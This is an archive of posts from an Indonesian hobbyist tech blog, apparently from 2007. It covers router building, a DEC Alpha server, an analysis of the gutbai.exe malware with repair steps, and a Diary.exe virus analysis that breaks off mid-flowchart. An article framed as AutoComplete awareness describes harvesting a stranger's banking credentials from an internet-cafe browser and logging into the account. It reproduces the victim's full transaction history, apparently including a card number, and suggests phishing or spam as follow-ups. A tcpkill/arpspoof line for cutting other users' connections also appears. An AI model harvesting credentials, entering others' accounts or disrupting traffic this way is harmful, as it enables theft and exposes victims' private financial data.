hehehehe lumayan asik kan ARP Spoofing, gak hanya buat sniffing juga tapi bisa kita blok koneksi tertentu misal :

root@slack:~# tcpkill -9 host www.playboy.com

Untuk matiin proses si arpspoof n tcpdump bisa dengan cara :

root@slack:~# killall arpspoof
root@slack:~# killall tcpdump

:) :)

PC164 DEC ALPHA Server part - 2

2007-07-18T17:40:00.000+07:00

Setelah ganti bahasa si NT 4.0, pgn jajal install linux di ALPHA. Menurut referensi dari www.alphalinux.org, ada beberapa distro linux yang bisa diinstal di architecture ALPHA. Diantarana itu ada Debian, CentOS, slackware n dll... Cari2 referensi lain dari oms google, katana kalo linux/unix di ALPHA hanya dukung SRM Console :(, akhirna harus diupgrade firmware si ALPHA jadi SRM Console... dapet dari http://ftp.digital.com/pub/Digital/Alpha/firmware/, aq pilih PC164 SRM Console. Donlod versi terbaruna, ekstrak ke floppy, trus dari menu ARC tinggal pilih upgrade firmware ato jalanin fwupdate.exe dari disketna :) :). Flashing...flashing si firmware, jadi deh SRM Console terinstall!!!

Humm.. bentukna si SRM Console mang bener2 "Console", alias perlu command2 buat jalanin fungsina... kebetulan ada manual-reference bagus dari situs red-hat, http://www.redhat.com/docs/manuals/linux/RHL-7-Manual/alpha-install-guide/s1-alpha-srm.html, hehehhehe bisa boot ke IDE ato SCSI, trus ngeliat Device yang terkoneksi n dll....

Untuk distro, aq pertama pilih si CentOS. Pertama kali booting dari CD dah ada msalah... akhirna coba si FreeBSD.... booting, installing, gk da masalah... eh ada masalah pas detek devicena :(... ya udah akhirna beralih ke Debian Etch :)....

Booting dari CD, partisi Disk, dll sampe jalanin si "pingu" Debian gak masalah! horeeeeeee!!!! Tapi gk kuatna donlod file ISOna itu, banyak betul :( ...

Sampe sekarang aq pake si Debian di box ALPHA, setting jadi bridge + install squid jadiin transparent proxy :) lancarrrrrrrrrrrr :) :)

Bikin PC lawas jadi PC Router.. My version! Part - 2

2007-07-09T01:00:00.000+07:00

Berkat bantuan Mr. Edwin from webhq_nl@motherboards.mbarron.net, baru tau kalo mobo si cilik itu HOT-555 rev. 1.4. Dah lengkap dikirimin manual mobona ma dia, mulai ngutak-atik jumper buat naikin multiplier, system clock n voltage. Upsss... Pentium MMX itu perlu dual voltage, 2.8 v dan 3.3 v, jgn lupa ma settingan ini :). System clock diubah ke 66 MHz (sesuai manual), multiplier set ke 1:3.... Taraaaaaa akhirna processor dengan mulus berjalan di kisaran 166 MHz, kenapa cuman 166 MHz? ternyata dari chipset i430 VX mang ada beberapa yg cuman sanggup jalanin Pentium MMX secara maksimal di clock tersebut :( ya gpp lah, yg penting si cilik "agak" powerfull...

Karena nih PC pgn dijadiin PCRouter, maka NIC perlu lebih dari 1 (sukur2 bisa dipasang 3 :P). Aq pakein 3 NIC, macem2 deh merekna.. Maklum beli seken di deket kampus @ 12500 :)... Aq bikin kayak gini skemana :

Modem 192.168.1.1 ---- NIC 1 (Internet) 192.168.1.2
|--- NIC 2 (Lan) 192.168.0.1 ---- Switch LAN
|--- NIC 3 (Wireless_LAN) 10.0.0.1

Hardware dah selese, sekarang urusan OS... OS yg mo dipake tentuna OS Router, kayak Mikrotik (mikriting aq nyebutna :P), atau IPCop, n dll... Untuk IPCop lom pernah coba berhubung masi gagal installansi di mesin ALPHA :)...

Mikrotik yg aq pake versi 2.9.27, hehehe untuk eksperimen masih pake yang "gratisan" :P... Instalansi gak da kendala, tinggal pilih2 paket yang ingin diinstall (linux bgt!) trus save, reboot... :D :D

Dari mikrotik dah disediain tools management GUI, kayak winbox bahkan bisa diakses lewat web :D...

Kalo dah bisa login ke shellna si mikriting (default user : admin, pass : [blank]), bisa setting ip address buat masing2 NIC :

[admin@MiKriting] > /ip address add address=xxx.xxx.xxx.xxx/subnet interface=[NIC_NAME]

NIC_NAME adalah nama NIC, kalo binun bisa pake perintah /interface print, kira2 gini outputna di shellna si mikriting :

[admin@MiKriting] > /interface print
Flags: X - disabled, D - dynamic, R - running
# NAME TYPE RX-RATE TX-RATE MTU
0 wireless_lan ether 0 0 1500
1 R Internet ether 0 0 1500
2 R bridge1 bridge 0 0 1500
3 R lan ether 0 0 1500

Kalo binun nentuin NIC mana sih yang ke 1, 2, 3, dst.. bisa pake perintah :

[admin@MiKriting] > /interface ethernet blink [NIC_NAME}

Nanti liat di panel belakang, NIC mana yg lampu LEDna kedip2 :)

Kalo dah di add ip addressna, bisa liat konfigurasina dah bener pa lom dengan :

[admin@MiKriting] > /ip address print
Flags: X - disabled, I - invalid, D - dynamic
# ADDRESS NETWORK BROADCAST INTERFACE
0 ;;; AP
10.0.0.1/24 10.0.0.0 10.0.0.255 wireless_lan
1 ;;; Internet
192.168.1.2/24 192.168.1.0 192.168.1.255 Internet
2 ;;; LAN
192.168.0.1/24 192.168.0.0 192.168.0.255 lan

Sekarang tinggal bikin NAT, Queue (kalo pake BW management :)), dll... tapi bersambung dulu... ngantuk >.<

Bikin PC lawas jadi PC Router.. My version! Part - 1

2007-07-06T14:15:00.000+07:00

Di rumah ada 1 PC lama (lawas) yg gak kepake, diubek2 ternyata masih bisa idup.... sebenarnya sih ni PC dapet dari temen (dihibahkan gitu :P), berhubung gak da HDna jadi gak isa diapa2in... Kebetulan gi pengen bikin WLAN (Wireless LAN), jadina butuh 1 router, ya udah mulai deh projek "rebirth" si PC ...

Spek umum dari PC lawas ni :

Processor : Pentium S - 120 Mhz
RAM (EDO) : 16 MB
Mobo : Merek gak tau, chipset i430VX (intel Triton)

Hardware pertama yang dicari adalah HD, ketemu di pasar loak jatinegara (dulu sih masih rame, sekarang dah pada berkurang akibat pembangunan busway), dapet Fujitsu 4.3 GB, hargana waktu itu sekitar 65 rebuan... Buat processor kayakna agak kurang mantap, jadina nyari di toko2 komputer deket kampus margaonda, dapet Pentium 233 MHz MMX... lumayan murah 1 biji hargana 15 rebu, eh kebetulan ada yg masih jual EDO RAM juga, 2 keping @ 16 MB hargana 5000 dua biji tuh :D :D sekalian beli HSF (Heatsink Fan) baut processorna, kasian nanti gak kuat kalo panas :D...

Buka casing PC "cilik" (cilik aq nyebutna, soalna ukuranna kayakna mini-Atx.. PC yg lain gede2, si ALPHA aje lebih gede dari si Pentium 4 >.<), copot processor lama, tambahin thermalpaste, pasang HSF... Taraaaaaaaaaa.... telah diupgrade si "cilik", EDO RAM tinggal pasang di 2 slot yg masih tersedia.. oiya, PC lawas biasana perlu konfigurasi RAM yang pasang2an, maksudna sekali pasang harus 2. Itu juga spekna harus sama >.<..

Ngetes booting, dah dikenalin ma si mobo blom ya? waksss, kok masih nampil 120 MHz!!?? Duh nyari info di paman google nemu kalo PC lawas itu perlu setting jumper buat multiplier, voltage ma system clock buat Processor baru >.<

Berhubung vendor mobona gak tau, akhirna dapet info kalo dari nomor seri BIOS (itu loh angka2 yg muncul pas pertama kali boot, biasana sih di bagian bawah layar) bisa diketahuin jenis BIOS + Vendor mobona. Dicatet trus main ke http://www.wimsbios.com/awardnumbers.jsp, cari2 referensi dari format nomor seri BIOS si "cilik" eh dapet! ternyata vendorna itu Shuttle HOLCO versi HOT-55x.

Waduh "x" dari HOT-55x itu paan ye? nyari2 di paman google juga gak da mobo seri yg "x" gitu, berarti mang "x" itu adalah angka, diasumsikan karena versi2 yang tersedia itu HOT-553 hingga HOT-559 :( ...

Akhirna nanya di forum http://motherboards.mbarron.net/forum/ , nyari2 sapa tau ada bisa setting jumper di mobo "cilik" ... mudah2an ada yg bales ... Amiiin :D :D

Bersambung dulu ye, nanti dilanjutin lagi :D :D

Telkom Speedy?? Part - 1

2007-06-30T01:11:00.000+07:00

Speedy, dari namanya juga bisa diketahui kalo sesuatu yang cepat.. humm produk koneksi internet broadband dari Telkom ini mang banyak pro n kontra. Aq sebagai salah satu penggunanya (kira2 dah 1 tahun), juga mulai berpikiran kalo apa yang dijadiin permasalahan orang banyak itu mulai terjadi.

1. Trafik yang padat, terjadi lebih sering di siang hari.. entah itu memang banyak yg gi make ato ada masalah dari infrastruktur telkom itu sendiri.

2. Security, paling kritis nih yg satu ini... bayangin ajah (menurut pengamatan n pengalaman ndiri :P) hampir 70% pengguna speedy masih buta ttg pentingnya sekuritas koneksi internet mereka. Selanjutnya ttg hal ini akan dibahas lebih lanjut :D

3. Biaya, paling penting nih!! harga paket personal itu 200 rebu per bulan, unlimited office 750 rebu... kalo dibandingkan koneksi dedicated ato wireless tergolong cukup terjangkau. Pertanyaanya, apa bisa dengan biaya 200 rebu itu quotanya dihilangkan alias menjadi unlimited?? :P hehehhe biasa, cara pikir yang gk mo rugi :P

4. Teknisi yang (menurut aq loohhh! :P) kurang berpengalaman, bukan menyebut "semua" teknisi speedy gak berpengalaman, tetapi sebagian memang bukan berdasar IT. Sehingga jika terjadi masalah memang terkesan lamban atau tidak resolve sama sekali.

Kebetulan ajah kemarin sempet ngobrol2 ma teknisi speedy yang dateng ke rumah soal kualitas speedy sekarang dibandingkan dgn yang dulu... memang meningkat tetapi lebih baik lagi kalo bisa "dekat" dgn hati para pelanggan, baik itu masalah teknis maupun masalah lainnya :D :D

Apalagi kan udah ada forum di telkomspeedy.com dgn kang Onno membahas soal ADSL n Speedy, mudah2an para petinggi speedy bisa "mendengar" kelu kesah para pelanggan speedy ... :D :D

PC164 DEC ALPHA Server part - 1

2007-06-30T00:10:00.000+07:00

Pernah punya mesin "legendaris" ini??? duuh pertama kali punya ni mesin susahhhhhhnya minta ampun mo upgrade OSnya... kenapa?

1. OS Bawaan dah terpasang Windows NT 4.0 German, kebayang binunna baca tulisan n keyboard mappingna juga beda amat ma US Internasional (OMG!!!!!)

2. Binun pake firmware bawaan, ARC ... tapi lebih enak karena dah berupa menu2 ^_^

3. CD ROM SCSIna dah agak soak, dibuka, ditutup, kebuka lagi... gak tau napa... jgn2 ada penungguna? >.<

4. Lom tau jenis ALPHA Server yang mana, abisnya cuman ada petunjuk jenis prosesor (RISP)nya doank, 21164... btw soal RISC nanti dijelasin yaa ^_^.

Akhirnya diputusin upgrade, sebutanna upgrade gak yah? soalnya cuman ganti NT 4.0 yang English :P... kebetulan ada kak rio (senior lab manajemen dasar) punya CD Windows NT 4.0 Workstation English version (<<< ini yang penting :P, original lagi!). Gimana tuh re-installingnya? Kayak install OS di PC biasa, tapi bedana buat milih boot ke CD, bikin partisi (hebat bgt nih ARC, ampe ada menu bikin partisina, tapi cuman bisa FAT
ajah :P) dilakuin di menu ARC. Nanti tinggal pilih menu Install Windows NT 4.0 From CD (Kalo gk salah nama manunya :P). Selanjutnya seperti install windows di PC biasa, setting partisi, language, serial number, n dll.

Oh iya, berbeda dgn windows arsitektur di PC biasa, khusus di arsitektur ALPHA perlu 1 partisi tambahan yaitu OSLOADPARTITION guna mem-boot si windows NT. keterangan lengkap ada di : http://support.microsoft.com/kb/172952

Perlu diketahui support dari Microsoft terhadap Windows NT 4.0 di ALPHA ini hanya sampai Service Pack 4, kemarin pgn upgrade ke service pack 6 gagal :(

Referensi ALPHA n Windows NT : http://www.alphant.com/ant_faq.shtml

RISC atau reduced instruction set computer adalah jenis CPU yang "dipangkas" fitur2na, contohnya : ALPHA, SPARC, ARC, ARM, AVR, MIPS, Dll. Referensi : http://en.wikipedia.org/wiki/RISC

My PI ... :(

2007-06-29T21:57:00.001+07:00

Waaaaaaakkksss, PI (Penulisan Ilimiah) aq gimana niiiiihh? mana si iqbal harus ke yogya 1 bulan.. otomatis sidang sendirian deh :(... mudah2an dosen pegujina gk nanya macem2... amiiiiiiiiiinnnnnnnn !!!

Btw PI yg aq tulis itu : "Pembuatan Aplikasi Transformasi Citra Dengan Menggunakan MATLAB 6,5".. duh ribet yakk?? kekekekekkeke, iya nih MATLAB mang terkenal ma ribetna... mana matriks semua operasina T_T.

Dah di Acc sih ma DP (Dosen Penguji), tapi ya itu masalah sidang masih gak jelas!!! duh binun binun binun binun binun :((....

Access Point...

2007-06-29T21:39:00.000+07:00

Duh pengen belajar ttg Wifi nih... sapa tau bisa buka RtRwnet disini :P :P hehehe

Kebetulan kemarin di forum rtrwnet baca2 soal AP yang bagus (nyari yg bisa mode Client juga :P), nemu LinkSys WRT54G/L/S... kata orang2 sih mang jadi "Legenda" nih AP, soalna bisa di update firmware jadi lebih banyak fitur n bisa diinstallin aplikasi karena berbasis linux (bener gak yah? lom nyoba :P)....

Yaudah deh, langsung kontak ke salah satu yg jual di forum (oms maman :D).. mesen 1 trus besok diambil... sempet ditawarin AP TP-Link (lupa versi brapa >.<) yg support RangeExtender (bener gak yah fiturna :P) yg lebih murah... tapi kok jadi bimbang ye? pilih harga agak murah apa yg banyak fitur yg bisa dioprek???

Yowis, diputuskan dengan suara bulat, langkah tegap maju jalan, bibir mengucap "Bismillah", tangan mengetik dengan mantap di YM, "Yang Linksys ajah deh oms!".... hehehe mudah2an nih AP jadi mainan baru buat Aq.. :D :D Wish Me Luck!! :D :D

Staff @ EcH0!!!!

2007-06-28T23:01:00.000+07:00

Duuhhhhhhhh senangnya diterima jadi staff di EcH0 (www.echo.or.id), setelah menulis 2 artikel yg dikerjain dgn SKS (Sistem Kebut Sejam) akhirna Alhamdulilah diberi kesempatan untuk menjadi salah satu (penjaga) disana :P

Mudah2an para staff yang udah senior bisa bimbing aq, ngasi solusi saat aq dilanda problema, sharing knowledge demi kemajuan bersama, dll :D :D

Hehehehe, kira2 tugas pertamana apa yah??? Asal jgn suruh mijetin aje -.- :P....

Anyway, Viva EcH0...!!! Let's Work together, share together :D :D

Gutbai.exe, Apa dan Solusinya

2007-06-28T23:00:00.000+07:00

Author : PusHm0v @ PusHm0v Software Development
Date : 18/9/2006

Shoutz : All echo|staff, yogyafree|staff, The Killer Team
Myztx, vaganci, ^family_code^, TOMMY, adhietslank, etc.
#e-c-h-o, #yogyafree, #javahack, #koncek, #canda, #canda-ops @DAL.NET
newbie_hacker@yahoogroups.com, yogyafree@yahoogroups.com
IT_CENTER@yahoogroups.com, ProgrammerVB@yahoogroups.com
virus_baru@yahoogroups.com
VBbego.com, Virology.info, Vbtn.com
IA01 dan 1IA07, Lab MaDas angk. 19 @ Gunadarma University
Dan teman2 serta kerabat2 lain yang tidak bisa disebutkan satu-persatu

Notes : Penulis TIDAK bertanggung jawab atas penggunaan maupun penyalahgunaan dari artikel ini.
Tujuan dibuat artikel HANYA untuk BAHAN PEMBELAJARAN saja.
Semua nama, URL, domain, IP address, username, password dalam artikel ini disamarkan demi
keamanan dan privasi.
Bila pembaca artikel ini menganggap artikel ini menyinggung perasaan, maka Penulis
memohon maaf sebesar-besarnya.

Main#
Beberapa waktu yang lalu penulis dimintai untuk mencoba sebuah aplikasi oleh mas Kurniawan (^family_code^), yaitu
gutbai.exe. sang author aplikasi ini mengkalim bahwa telah menemukan celah di Microsoft Windows yang bisa membuat
Bill Gates gulung tikar (walaupun pada tahun depan om Bill bakal mengundurkan diri :P). Aplikasi Gutbai.exe tidak akan
mempengaruhi kinerja system, demikian klaim sang author. Walaupun pada kenyataannya aplikasi ini SANGAT-SANGAT merusak
Windows anda. Beberapa analisa penulis terhadap aplikasi gutbai.exe :

1. Compiled dari VB 6.0, dengan no packer dan native code.
2. Mengubah/menambah beberapa key registry :
* DisableRegistryTools
* DisableTaskMgr
* HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell\Explorer.exe menjadi gutbai.exe
* HKLM\Software\Microsoft\Windows\CurrentVersion\policies\system\Shell\Gutbai.exe
3. Mencopy dirinya sendiri ke C:\Windows
4. "Membunuh" proses Explorer.exe

Bila dijalankan, aplikasi ini akan memunculkan window dengan 2 Button yang pertama berisi tantangan untuk meng-kliknya dan
kedua akan menutup aplikasinya. Bila button pertama diklik maka akan muncul MessageBox yang berisi bahwa anda sudah menjalankan
tantangannya dan aplikasi akan me-Log Off anda. Begitu anda Log On kembali maka anda hanya dihadapkan tampilan wallpaper saja.
Mengapa demikian?? karena pada dasarnya Windows melakukan boot secara garis besar sbb:

Boot Sector -> NTLDR -|
|-> Ntdetect.com -> HKLM\HARDWARE\DESCRIPTION
|-> HKLM\SYSTEM\CurrentControlSet\Services
|-> Ntoskrnl.exe |-> bootvid.dll
|-> Windows Session Manager (smss.exe) -> HKLM\SYSTEM\CurrentControlSet\Session Manager\Bootexecute
-> HKLM\SYSTEM\CurrentControlSet\Session Manager\Memory Management\PagingFiles
-> HKLM\SYSTEM\CurrentControlSet\Session Manager\Environment
-> Winlogon -> MSGina.dll
-> Shell (Explorer.exe) ;Nah disini lah permasalahan terjadi

Sang gutbai.exe menggantikan dirinya sebagai shell yang asli, yaitu Explorer.exe. Maka dari itu anda tidak mempunyai shell tapi mempunyai logon yang valid,
karena MSGina sudah dieksekusi terlebih dahulu. TaskManager tidak bisa dibuka, sama halnya dengan Registry Editor (Regedit) karena telah di blok.

Solusi#
Banyak cara untuk mengembalikan shell asli anda, seperti menggunakan media boot CD, disket, USB, dll. Yang pada dasarnya mengganti value registry yang telah
diganti oleh aplikasi tsb. Berhubung kita menggunakan media boot, maka tidak dapat mengubah Registry secara langsung. DIperlukan aplikasi yang dapat membaca
dan mengubah value registry. Untuk penyimpanan Registry Windows terdapat pada %SystemRoot%\Config\Software (karena HKLM\Software yang kita tuju).
Dianjurkan menggunakan aplikasi yang sifatnya GUI (Graphical User Interface) dalam mengubah registry supaya memudahkan recovery. Penulis menggunakan
CD Recovery XP 1.00 Build On PEBuilder yang didalamnya sudah terintegrasi Regedit bawaan. UNtuk mendapatkan atau mengetahui cara membuat CD tsb bisa menghubungi
penulis.

Cara Recovery:
1. Buka Regedit dari Run
2. Browse HKEY_LOCAL_Machine
3. Pilih File pada menu dan pilih Load Hive (File Type : Hive File)
4. Browse ke Drive windows anda (biasanya C:)
5. Browse ke C:\Windows\System32\Config, lalu pilih file Software
6. Akan muncul kotak input box, Buat nama key baru misal HKEY_BARU
7. Browse ke HKEY_BARU\Microsoft\Windows\CurrentVersion\policies\system lalu hapus value Shell
8. Browse ke HKEY_BARU\Microsoft\Windows NT\CurrentVersion\Winlogon lalu ganti value Shell menjadi Explorer.exe
9.Pilih File pada menu dan pilih Export
10.Save 1 folder dengan file software tadi, misal dengan nama software2. Jangan lupa untuk memilih selected branch : HKEY_LOCAL_MACHINE\HKEY_BARU
11.Pilih File pada menu dan pilih UnLoad Hive
12.Browse ke C:\Windows lalu hapus file gutbai.exe
13.Browse ke folder C:\Windows\System32\Config, lalu hapus file Software dan rename file software2 menjadi software
14.Reboot Komputer anda

Bila pada komputer anda masih tidak dapat membuka Task Manager atau Regedit dapat menggunakan file repair.inf :

* BUka Notepad lalu ketikkan :

----Start Here-----
[Version]

Signature="$Chicago$"

Provider=the_killer_team

[DefaultInstall]

DelReg=del

[del]

HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\System,DisableRegistryTools
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\System,DisableTaskMgr
-----End Here------

Klik kanan pada file repair.inf tsb dan pilih Install.

Kesimpulan#
Aplikasi Gutbai.exe menghilangkan shell anda dengan menggantinya dengan aplikasi itu sendiri. Apakah ini termasuk "celah" pada Windows?
Kalo menurut penulis ini bukanlah suatu celah, tetapi hanya membuat Explorer.exe tidak Load. Cara Recovery tidak perlu dilakukan
dengan Go back, deep freeze atau instal ulang. Dengan menggunakan CD Recovery XP Bikinan sendiri kita dapat menanggulangi masalah tsb.

Penutup#
Penulis bukanlah Hacker Sejati, melainkan seorang yang masih belajar tentang dunia Teknologi Informasi. Sudah banyak E-zine yang menyebutkan apa itu seorang
hacker Sejati atau Elite atau apapun namanya. Bila ingin benar-benar mengexploitasi suatu celah OS, ada baiknya mempelajari apa itu shellcode, payload dan exploit.
Penulis tidak meragukan kemampuan author Gutbai.exe dalam pemograman, alangkah baiknya bila kemampuan tsb digunakan untuk kebaikan bersama =) =).

Auto Complete, Kemudahan atau Kerawanan???

2007-06-28T22:59:00.000+07:00

Author : PusHm0v @ PusHm0v Software Development
Date : 15/9/2006

Shoutz : All echo|staff, yogyafree|staff, The Killer Team
Myztx, vaganci, ^family_code^, TOMMY, adhietslank, etc.
#e-c-h-o, #yogyafree, #javahack, #koncek, #canda, #canda-ops @DAL.NET
newbie_hacker@yahoogroups.com, yogyafree@yahoogroups.com
IT_CENTER@yahoogroups.com, ProgrammerVB@yahoogroups.com
virus_baru@yahoogroups.com
VBbego.com, Virology.info, Vbtn.com
IA01 dan 1IA07, Lab MaDas angk. 19 @ Gunadarma University
Dan teman2 serta kerabat2 lain yang tidak bisa disebutkan satu-persatu

Notes : Penulis TIDAK bertanggung jawab atas penggunaan maupun penyalahgunaan dari artikel ini.
Tujuan dibuat artikel HANYA untuk BAHAN PEMBELAJARAN saja.
Semua nama, URL, domain, IP address, username, password dalam artikel ini disamarkan demi
keamanan dan privasi.
Bila pembaca artikel ini menganggap artikel ini menyinggung perasaan, maka Penulis
memohon maaf sebesar-besarnya.

Main#
Adanya fitur AutoComplete ataupun password storage di berbagai macam browser saat ini
merupakan terobosan inovatif, mengingat kemampuan seseorang dalam menghapal. Dengan
fitur ini pula kita dapat mengehemat waktu mengetik dan mengisi kolom username dan password.
Pernahkah anda bermain di suatu kafe internet atau kantor, dan membuka halaman login dari
Email anda mengetik atau menekan 1 huruf depan dari username anda browser saat itu juga langsung
menampilkan pilihan username-username yang sudah pernah diinputkan?? Bila anda memakai komputer
dengan single user mungkin tak masalah, lalu bagaimana bila multiuser?? Ada kemungkinan username
bahkan password anda dapat diambil oleh orang lain.
Berbekal aplikasi password recovery kita dapat mengambil dan membongkar username-password yang
tersimpan ini. Penulis menggunakan Passcape Internet Explorer Password Recovery (www.passcape.com).
Kebetulan Browser di warnet penulis menggunakan Internet Explorer (selanjutnya disingkat menjadi IE saja)
yang fitur AutoComplete sedang menyala.
Install Passcape Internet Explorer Password Recovery (selanjutnya disingkat menjadi PIEPR saja),
lalu pilih metode Recovery yang akan dijalankan :

* AUTOMATIC : akan membuka Password yang tersimpan secara otomatis
* MANUAL : akan membuka Password melalui file ntuser.dat, biasanya di C:\Documents and Settings\%nama_user%
* CONTENT ADVISOR : akan meng-Edit status dan password dari Internet Explorer Content Advisor
* ASTERISKS PASSWORDS : akan membuka "tabir" karakter '*' atau asterik dari kolom password
* MISCELLANEOUS : akan menampilkan macam-macam cookie, cache atau URL yang disimpan oleh IE

Kita akan menggunakan fitur AUTOMATIC untuk membuka password yang tersimpan. Klik Next>> lalu PIEPR akan
menampilkan sejumlah kolom yang berisi keterangan resource IE apa yang dapat dibuka beserta username dan password.

Contoh hasil Recovery PIEPR:

<<< Internet Explorer passwords >>>

Created by Passcape Internet Explorer Password Recovery

IE resource type : IE autocomplete passwords
Resource name : https://ib.bankapajah.co.id/retail/Login.do
User name/Value : xxxxxxx
Password : xxxxxxx

IE resource type : Identity passwords
Resource name : Main Identity
User name/Value :
Password :

PIEPR v1.4.1.170
09-15-2006 10:23:08

Diatas merupakan username dan password dari sebuah session login internet banking di salah satu Bank swasta nasional.
Dapat dibayangkan apa yg terjadi bila kita mempunyai akses untuk melihat, mengubah bahkan mengambil uang dari akun tersebut.
Berikut contoh hasil pemeriksaan saldo dan histori transaksi dari akun tersebut:

NAMA_ORANG_YANG_KENA_TEPU
15 Sep 2006, 12:53:40 HELP

POSISI SALDO

Nomor Transaksi : 0609150069978
Nomor Rekening : xxxxxxxxxxxxx
Jenis Rekening : Tabungan
Tanggal - Jam : 15 September 2006 - 12:53 PM
Posisi Saldo : Rp. 3.352.512,44

HISTORI TRANSAKSI

Nomor Transaksi : 0609150070131
Nomor Rekening : xxxxxxxxxxxxx Rp.
Jenis Rekening : Tabungan
Periode Transaksi : 14 Aug 2006- 15 Sep 2006
Tampilkan Berdasarkan : Tanggal
Urutkan Berdasarkan : Mulai dari yang kecil

Tanggal Keterangan Transaksi Debet Kredit
14/08/2006 VE POS SA
21765315 /0000186584/VAP-SARINAH THA 160.000,00 0,00
14/08/2006 SA ATM PLN PAYM DR
41100046011547100899423
S1AD00FW /6765 /ATM-SPBU P KLP 150.115,00 0,00
14/08/2006 SA ATM PLN PAYM DR
41100046011547100899423
S1AD00FW /6765 /ATM-SPBU P KLP 2.500,00 0,00
15/08/2006 SA ATM Withdrawal
S1AD00FW /7581 /ATM-SPBU P KLP 1.000.000,00 0,00
15/08/2006 INW.CN-SKN CR SA-MCS
CHEVRON INDONESIA COMPANY - 032 0,00 2.234.825,00
15/08/2006 VE POS SA
00019333 /0000198403/VAP-TOKO GUNUNG 101.000,00 0,00
17/08/2006 SA ATM Withdrawal
S1AD00FW /7878 /ATM-SPBU P KLP 1.000.000,00 0,00
19/08/2006 SA ATM Withdrawal
S1AP125I /3170 /ATM-TMN GALAXY1 500.000,00 0,00
20/08/2006 VE POS SA
61029923 /0000292379/VAP-MDS (ARION 195.000,00 0,00
22/08/2006 SA ATM Withdrawal
S1AP1449 /6920 /ATM-KC T AGUNG1 1.000.000,00 0,00
23/08/2006 SA ATM Withdrawal
S1AM141Z /9388 /ATM-BDR JUANDA2 500.000,00 0,00
26/08/2006 SA ATM Withdrawal
S1AP12EQ /9678 /ATM-METROPOLITA 100.000,00 0,00
27/08/2006 SA ATM Withdrawal
S1AD00FW /1633 /ATM-SPBU P KLP 150.000,00 0,00
28/08/2006 INW.CN-SKN CR SA-MCS
CHEVRON INDONESIA COMPANY - 031 0,00 13.866.238,00
31/08/2006 Bunga Rekening 0,00 14.740,63
31/08/2006 Biaya Administrasi 7.000,00 0,00
02/09/2006 SA OB SA No Book
Transfer untuk September
1250005534326 5.000.000,00 0,00
02/09/2006 SA OB SA No Book
Transfer untuk September 1.000,00 0,00
02/09/2006 INT-BK CCPYM CA/SA
4137180305168351 300.000,00 0,00
06/09/2006 INT-BK CCPYM CA/SA
4137180305168351 2.543.987,00 0,00
06/09/2006 INT-B DR SA BILL PMT
030208160140021008226614 170.804,00 0,00
06/09/2006 SA INT PLN PAYM DR
41000046014547100899423 150.115,00 0,00
06/09/2006 SA INT PLN PAYM DR
41000046014547100899423 2.500,00 0,00
06/09/2006 SA OB SA No Book
untuk bni chay, thanks
1250005534326 2.500.000,00 0,00
06/09/2006 SA OB SA No Book
untuk bni chay, thanks 1.000,00 0,00

Saldo Awal : 2.771.729,81
Total Kredit : 16.115.803,63
Total Debet : 15.535.021,00
Saldo Akhir : 3.352.512,44

Waw!!! kita bisa melihat semua transaksi akun tersebut. Apa yang bisa kita lakukan setelah itu? kita bisa melakukan
phising ataupun spamming dengan mengambil data-data penting lainnya, seperti :

UBAH ALAMAT E-MAIL

Nama : NAMA_ORANG_YANG_KENA_TEPU
Tanggal Lahir : 29 February 1900
Alamat E-Mail : KENA_TEPU@mailboongan.com

Solusi#
Bisa kita bayangkan akibat terburuk dari password stealing seperti itu, transfer dana tanapa kita duga, pengambil-alihan
rekening, pengubahan password, hingga pencurian data-data penting kita. Bagaimana kita menghindari hal tersebut?
Aplikasi pembersih Cookie atau cache Browser dapat kita manfaatkan, bahkan dari IE pun sudah ada fitur ini.

> Buka browser IE anda, pilih Tools pada toolbar.
> Pilih Internet Options
> Klik Delete Cookies untuk menghapus cookies anda, Delete Files untuk menghapus file-file temporer dan Clear History untuk
membersihkan sisa-sisa "perjalanan" anda selama browsing.

Bila fitur tersebut dirasa kurang memadai, maka anda dapat menggunakan aplikasi third party, seperti cookies washer atau sejenisnya.
Selain ancaman Password recovery seperti PIEPR, ada aplikasi keylogger yang dapat mencatat semua ketikan anda. Untuk mengakali hal ini,
anda dapat menggunakan fitur on Screen-keyboard Windows.

> Buka menu START, pilih ALL Programs lalu Accessories
> Lalu pilih On-Screen Keyboard.

Kesimpulan#
Pencurian password dan username dalam komputer publik merupakan hal yang wajar mengingat kelemahan sistem yang ada.
Fitur AutoComplete yang disediakan oleh Browser saat ini dapat menjadi bumerang bagi pemakainya apabila tidak berhati-hati
dalam pemakaiannya. Aplikasi Password Recovery seperti PIEPR dapat menampilkan semua username dan password yang pernah disimpan
selama kegiatan Browsing. Lakukan pembersihan Cookies dan History anda setiap kali selesai browsing agar menghindari penyalahgunaan
hak akses.

Penutup#
Penulis tidak bermaksud untuk mengajak pembaca menjadi seorang "PENCURI", tetapi prihatin atas kurangnya informasi dan kesadaran
dari pengguna komputer publik dalam menjaga rahasia pribadinya. Dengan artikel sederhana (mungkin jelek :P) ini penulis ingin membawa
pembaca untuk lebih waspada terhadap teknik-teknik pencurian data rahasia. Semoga artikel ini bermanfaat bagi kita semua. Amien. =)

Diary.Exe, Apa dan Bagaimana?

2007-06-28T22:58:00.000+07:00

- 13-3-06 -

$A little Words...
Penulis ingin menyampaikan bagaimana virus Diary.exe bekerja
dan tidak ada maksud untuk menyinggung atau menyakiti perasaan
korban - korban yang telah terinfeksi oleh virus ini.
Analisis Virus dalam Artikel ini mungkin bersifat sangat Dasar,
oleh karena itu Saya mohon maaf sebesar-besarnya jika ada kekurangan.

$Start...
>Diary.Exe adalah salah satu Virus (yang katanya cukup Berbahaya oleh Vaksin.com) buatan
Vxer (pembuat Virus) lokal. Virus ini dibuat dengan menggunakan Bahasa Visual Basic 6.0.
Menurut Norman AV, virus ini dikategorikan sebagai varian dari Virus Kangen yang sempat
tersebar beberapa waktu lalu. Saya tidak tahu mengapa disebut-sebut sebagai varian kangen,
apakah karena Icon yang dipilih adalah Icon MS-Word? atau karena sifatnya yg menginfeksi
file MS-WORD saja? Sampai saat ini saya belum tahu..
Yang pasti virus ini pertama kali disebarkan di Laboratorium Komputer di salah satu
Universitas yang ada di Depok.
>Virus Diary.Exe bekerja menggunakan algoritma (yang kurang-lebihnya) sebagai berikut :

|START EXECUTION|

|

| Create File Diary Seorang Newbie.txt |
|di folder %userprofile%\Application Data|

|

|Periksa apakah folder %ProgramFiles%\Common Files\System ada?|

| tidak ada
|------------------------------------------->|
ada| |

